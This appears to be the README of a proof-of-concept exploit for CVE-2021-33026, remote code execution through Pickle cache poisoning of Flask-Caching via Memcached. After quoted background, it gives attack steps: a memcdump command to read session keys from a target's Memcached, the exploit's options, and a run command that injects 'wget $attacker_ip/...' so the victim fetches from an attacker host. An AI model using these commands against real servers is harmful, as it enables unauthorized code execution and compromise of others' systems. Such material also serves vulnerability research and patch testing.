# CVE-2021-33026
Pickle Serialization Remote Code Execution - Memcached Poisoning PoC Exploit


**What's CVE-2021-3306?**

>"The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code."

**What's the Function of the Pickle Library?**

>"Pickle in Python is primarily used in serializing and deserializing a Python object structure. In other words, it's the process of converting a Python object into a byte stream to store it in a file/database, maintain program state across sessions, or transport data over the network."

**What's Memcached?**

> "Memcached is a general-purpose distributed memory-caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source must be read."

**[!] Exploitation:**

*1. In order to get the exploit to work it is necessary to provide a session cookie, why? In this proof of concept we have a case where the session cookie of a vulnerable Flask application is being managed or stored by the memcached service:*

```
memcdump --servers=target_machine_ip_address
```
![imagen](https://user-images.githubusercontent.com/69405457/140571838-908dff4e-6766-41a1-848e-62ccd83f643c.png)

*2. Exploit Usage:*

```-h --> help menu```

```--cmd --> Command to get executed on the target machine```

```--rhost --> Target Machine Ip Address```

```--rport --> Target Machine Port```

```--cookie --> Your ACTUAL SESSION COOKIE from the VULNERABLE FLASK Application. Example: session:58e61600-9ecf-45b8-b7b8-db2f0a00f421```

*3. Running the exploit:*

```
python3 cve-2021-33026_PoC.py --rhost $target_machine_ip_address --rport $target_machine_port --cmd "wget $attacker_ip/picke_memcached_posisoning_exploit" --cookie "session:58e61600-9ecf-45b8-b7b8-db2f0a00f421"
```
![imagen](https://user-images.githubusercontent.com/69405457/140569282-264e741c-c3b9-40c2-9837-7e06ea54677a.png)
![imagen](https://user-images.githubusercontent.com/69405457/140569333-c53e0a3e-4d00-4380-9856-f04769e896a8.png)


**Reference:**

https://nvd.nist.gov/vuln/detail/CVE-2021-33026

https://github.com/pallets-eco/flask-caching/pull/209

https://www.synopsys.com/blogs/software-security/python-pickling/
